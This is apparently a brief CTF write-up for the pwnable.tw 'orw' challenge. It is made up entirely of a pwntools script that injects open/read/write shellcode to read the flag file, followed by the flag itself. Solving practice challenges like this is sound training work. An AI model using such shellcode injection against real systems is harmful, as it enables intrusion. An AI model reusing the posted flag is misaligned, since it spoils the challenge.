pwnable/pwnable.tw
[pwnable.tw] orw write-up
ba0bab
2018. 8. 19. 00:45
from pwn import *
s = remote("chall.pwnable.tw", 10001)
context(arch='i386', os='linux')
s.recvuntil(":")
payload = shellcraft.pushstr("/home/orw/flag")
payload += shellcraft.open("esp",0,0)
payload += shellcraft.read("eax", "esp", 0xff)
payload += shellcraft.write(1,"esp", 0xff)
s.sendline(asm(payload))
s.interactive()
FLAG{sh3llc0ding_w1th_op3n_r34d_writ3}